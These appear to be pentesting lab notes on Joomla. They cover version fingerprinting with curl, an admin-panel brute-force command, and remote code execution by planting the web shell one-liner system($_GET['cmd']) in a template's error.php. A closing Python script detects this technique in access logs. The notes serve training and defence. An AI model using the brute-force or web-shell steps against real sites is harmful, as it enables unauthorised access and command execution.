Joomla

Tools

https://github.com/droope/droopescan

https://github.com/OWASP/joomscan

https://github.com/ajnik/joomla-bruteforce

Resources

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla

Discovery/Footprinting

#Verify if Joomla is installed
Intrusionz3r0@htb[/htb]$ curl -s http://dev.inlanefreight.local/ | grep Joomla

#Check the robots.txt
Intrusionz3r0@htb[/htb]$ curl -s 'http://app.inlanefreight.local/robots.txt'

#Check the Joomla version through Readme.txt
Intrusionz3r0@htb[/htb]$ curl -s http://dev.inlanefreight.local/README.txt | head -n 5

#Fingerprint the version from files
#In /administrator/manifests/files/joomla.xml you can see the version.
#In /language/en-GB/en-GB.xml you can get the version of Joomla.
#In plugins/system/cache/cache.xml you can see an approximate version.
Intrusionz3r0@htb[/htb]$ curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

#Run joomlascan
Intrusionz3r0@htb[/htb]$ python2.7 joomlascan.py -u http://dev.inlanefreight.local

#Joomla brute force against the admin panel
Intrusionz3r0@htb[/htb]$ sudo python3 joomla-brute.py -u http://app.inlanefreight.local/ -w /usr/share/wordlists/rockyou.txt -usr admin

Remote Command Execution

If you have obtained admin credentials, you can gain remote code execution by adding a snippet of PHP code to a template, since template files are editable from the admin panel and are served as PHP. We can do this by customizing a template.

  1. Click on Templates on the bottom left under Configuration to pull up the templates menu.

  2. Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.

  3. Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:

     system($_GET['cmd']);

  4. Save & Close

  5. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
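The technique above leaves two traces a defender can look for in the web server access log: a template-editor save through the admin panel, followed by a direct request to a PHP file under /templates/ with a query string (template PHP files are normally only reached through index.php). The following is an added detection example, not part of the original notes; the log lines are constructed, and the com_templates task names (template.save, template.apply) are assumed from Joomla 3's admin editor.

```python
import re

# Constructed combined-format access log lines; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:07 +0000] "POST /administrator/index.php?option=com_templates&task=template.save HTTP/1.1" 303 0 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:12 +0000] "GET /templates/protostar/error.php?cmd=id HTTP/1.1" 200 61 "-" "curl/7.88.1"
10.0.0.9 - - [10/Mar/2024:12:00:30 +0000] "GET /templates/protostar/css/template.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Minimal parser for Apache/Nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Direct request for a PHP file under /templates/, with or without a query string.
TEMPLATE_PHP_RE = re.compile(r'^/templates/[^/]+/.*\.php(\?|$)')
# Admin template-editor save/apply action (assumed task names for com_templates).
TEMPLATE_SAVE_RE = re.compile(r'option=com_templates.*task=template\.(save|apply)')


def analyse(log_text):
    """Return a list of (ip, timestamp, kind, path) findings from raw log text."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group('path')
        if TEMPLATE_SAVE_RE.search(path):
            findings.append((m.group('ip'), m.group('ts'), 'template_edit', path))
        elif TEMPLATE_PHP_RE.match(path):
            findings.append((m.group('ip'), m.group('ts'), 'direct_template_php', path))
    return findings


def correlate(findings):
    """Return the set of client IPs that both edited a template and then hit a
    template PHP file directly; that combination is the high-confidence signal."""
    edited, executed = set(), set()
    for ip, _ts, kind, _path in findings:
        (edited if kind == 'template_edit' else executed).add(ip)
    return edited & executed


if __name__ == '__main__':
    for f in analyse(SAMPLE_LOG):
        print(f)
    print('suspicious IPs:', correlate(analyse(SAMPLE_LOG)))
```

Pair this with a file-integrity check on the templates directory (for example, comparing against a clean copy of the same Joomla release), since an attacker can rename or remove the modified file after use.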
